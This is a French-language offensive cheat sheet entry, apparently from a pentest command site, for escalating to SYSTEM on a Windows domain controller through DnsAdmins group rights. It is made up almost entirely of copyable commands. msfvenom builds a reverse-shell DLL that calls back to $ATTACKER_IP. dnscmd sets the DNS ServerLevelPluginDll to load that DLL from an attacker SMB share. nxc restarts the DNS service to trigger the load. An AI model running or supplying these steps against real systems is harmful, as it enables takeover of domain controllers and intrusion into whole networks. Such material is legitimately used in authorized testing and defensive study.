Exploitation

DNS Admins

Charger une DLL arbitraire dans le service DNS via les droits DnsAdmins pour SYSTEM sur le DC.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'DnsAdmins'

Description: Vérifier l'appartenance au groupe DnsAdmins : donne le droit de charger une DLL dans le service DNS.

Copy command
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$PORT -f dll -o evil.dll

Description: Générer une DLL malveillante à charger dans le service DNS (tourne en SYSTEM sur le DC).

Copy command
dnscmd $DC /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dll

Description: Configurer le plugin DLL du service DNS : la DLL sera chargée au prochain redémarrage du service.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc stop dns && sc start dns'

Description: Redémarrer le service DNS pour déclencher le chargement de la DLL malveillante.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'reg query HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll'

Description: Vérifier que le plugin est bien configuré avant de redémarrer le service.